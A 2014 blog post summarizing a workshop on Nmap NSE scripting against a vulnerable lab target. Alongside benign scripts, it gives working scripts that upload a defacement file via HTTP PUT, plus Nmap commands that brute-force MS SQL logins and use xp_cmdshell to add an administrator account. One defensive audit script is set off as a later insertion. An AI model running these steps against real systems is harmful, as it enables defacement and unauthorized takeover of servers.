Sunday, February 2, 2014

NULL-HUMLA-NMAP-NSE-NetworkPentesting

This post is about the NULL Humla on NMAP NSE scripting, conducted by Sudhir Babu & Rupam Bhattacharya at the Bangalore Center for Internet and Society.

Agenda:

1. Getting familiar with the usage of nmap scripting
2. Look inside a script's source and understand its fundamental structure
3. Write your own script and run it with nmap against the target machine
4. Get a shell on the target using default scripts against a vulnerable system

Pre-requisite: two systems
                      1. Any system running the latest version of nmap
                      2. A target vulnerable system (Windows XP with SQL Server was provided)

Getting familiar with NMAP
http://www.nmap.org 

Location of script files on Linux system




How to run scripts 

#nmap -p80 -PN -n 192.168.2.128 --script=http-date

The following text comes from the description field of the script:

"This script will scan port 80 and if it's open it will check the date. Gets the date from HTTP-like services. Also prints how much the date differs from local time. Local time is the time the HTTP request was sent, so the difference includes at least the duration of one RTT."

Script Structure 

The following script (nmap's own daytime script) retrieves the day and time from the Daytime service on port 13:

local comm = require "comm"
local shortport = require "shortport"

description = [[
Retrieves the day and time from the Daytime service.
]]

---
-- @output
-- PORT   STATE SERVICE
-- 13/tcp open  daytime
-- |_daytime: Wed Mar 31 14:48:58 MDT 2010

author = "Diman Todorov"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"discovery", "safe"}

-- Run when port 13 (or a service identified as daytime) is open, over TCP or UDP
portrule = shortport.port_or_service(13, "daytime", {"tcp", "udp"})

action = function(host, port)
        -- comm.exchange sends "dummy" and reads one line back; the Daytime
        -- service ignores the input and answers with the current date and time
        local status, result = comm.exchange(host, port, "dummy", {lines=1, proto=port.protocol})

        -- Only return output when the exchange succeeded; nil prints nothing
        if status then
                return result
        end
end

Full details of the script format are available here -> http://nmap.org/book/nse-script-format.html

The following script lists the HTTP methods enabled on a web server:

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"

description = [[
Retrieves the methods enabled on a HTTP Server.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

-- Run only against ports that look like HTTP services
portrule = shortport.http

action = function(host, port)
        -- Send an OPTIONS request for "/" and hand the whole response table
        -- (status, headers, body) back to the NSE engine, which prints it
        local response = http.generic_request(host, port, "OPTIONS", "/")
        return response
end

Here the description, author and license fields are optional for personal use.

This opens a connection to the web server port, sends an OPTIONS request, and returns the response to the NMAP engine. The engine displays the result as shown below: the script name, and beneath it the script's output. This server allows GET, HEAD, POST and OPTIONS.



Another example, against a web server that allows more dangerous methods such as DELETE, PUT and MOVE:
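The OPTIONS check above can be turned into a small audit script that parses the Allow header and flags the write-capable methods just mentioned, so a scan of your own servers reports which ones need their method list tightened. This is an added example, not code from the Humla session or from the Nmap project; the file name http-risky-methods.nse and the script argument http-risky-methods.path are assumptions, while http.generic_request, stdnse.get_script_args and stdnse.output_table are the real NSE library calls.

```lua
-- http-risky-methods.nse (assumed name): added example, not part of the original
-- Humla material. Sends one OPTIONS request, parses the Allow header and reports
-- the methods that let a remote client change what the server serves.
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"

description = [[
Lists the methods a web server advertises in its OPTIONS response and flags
the ones that modify content (PUT, DELETE, MOVE, COPY, MKCOL, PROPPATCH).
]]

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}

-- Methods worth reviewing: they write to, delete or rearrange server content
local RISKY = {PUT = true, DELETE = true, MOVE = true, COPY = true,
               MKCOL = true, PROPPATCH = true}

portrule = shortport.http

action = function(host, port)
  -- Path to probe comes from a script arg (assumed name), defaulting to "/"
  local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/"
  local response = http.generic_request(host, port, "OPTIONS", path)
  if not response or not response.status then
    return nil  -- no usable answer; a safe script stays silent
  end
  -- http.lua stores header names in lower case
  local allow = response.header["allow"]
  if not allow then
    return ("OPTIONS %s returned %d without an Allow header"):format(path, response.status)
  end
  local allowed, risky = {}, {}
  for method in string.gmatch(allow, "[^,%s]+") do
    table.insert(allowed, method)
    if RISKY[string.upper(method)] then table.insert(risky, method) end
  end
  -- output_table keeps field order, so nmap prints "allowed" before "risky"
  local out = stdnse.output_table()
  out.allowed = allowed
  if #risky > 0 then out.risky = risky end
  return out
end
```

Run it the same way as the page's examples, e.g. nmap -p80 -PN -n <host> --script=./http-risky-methods.nse --script-args http-risky-methods.path=/ ; a "risky" line in the output means the method list should be restricted in the server configuration.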



How to put a file on the web server using an NSE script.

Method one: using http.put.

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"

description = [[
Uploads a file to a web server using the HTTP PUT method.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http

action = function(host, port)
        -- http.put(host, port, path, options, body): PUT the body string as /deface.txt
        -- and return the server's response table to the NSE engine
        local response = http.put(host, port, "/deface.txt", nil, "defacingweb")
        return response
end


To delete the uploaded file:

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"

description = [[
Deletes the uploaded file using the HTTP DELETE method.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http

action = function(host, port)
        -- Same generic_request call as the OPTIONS script, with the method changed to DELETE
        local response = http.generic_request(host, port, "DELETE", "/deface.txt", nil)
        return response
end

SOCKET

Method two: create the file using an NSE socket and a hand-built HTTP request.

local nmap = require "nmap"
local shortport = require "shortport"

categories = {"default"}

portrule = shortport.http

action = function(host, port)
        -- Open the socket inside action so each target/port gets its own connection
        local socket = nmap.new_socket()
        local status, err = socket:connect(host, port)
        if not status then
                return "connect failed: " .. tostring(err)
        end
        -- Hand-built PUT request; Content-length must match the 6-byte body "deface".
        -- The Host header is taken from the target instead of being hard-coded.
        socket:send("PUT /deface.txt HTTP/1.1\r\nHost: " .. host.ip .. "\r\nContent-length: 6\r\n\r\ndeface")
        -- receive() returns a status flag and the data (or an error message)
        local rstatus, response = socket:receive()
        socket:close()
        if not rstatus then
                return "receive failed: " .. tostring(response)
        end
        return response
end


Other default NSE script examples

MS SQL username/password brute forcing
#nmap -p 1433 --script ms-sql-brute --script-args userdb=username.txt,passdb=password.txt 192.168.0.5

MS SQL xp_cmdshell: add a user
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="net user admin1 admin1-password /add" 192.168.0.5

Add the user to the Administrators group (net localgroup administrators <username> /add)

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="net localgroup administrators admin1 /add" 192.168.0.5

Run other commands, for example "ipconfig"
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.0.5



Thanks to NULL++ Sudhir Babu ++ Rupam Bhattacharya & Riyaz Walikar ++ Akash Mahajan


2 comments:

1. A very good tutorial for the basics of nmap NSE scripting... and of course it was really a nice and interactive session. :)

2. Appreciate this. As this training is very selective, posting these does help people who are interested but couldn't make it to the training.
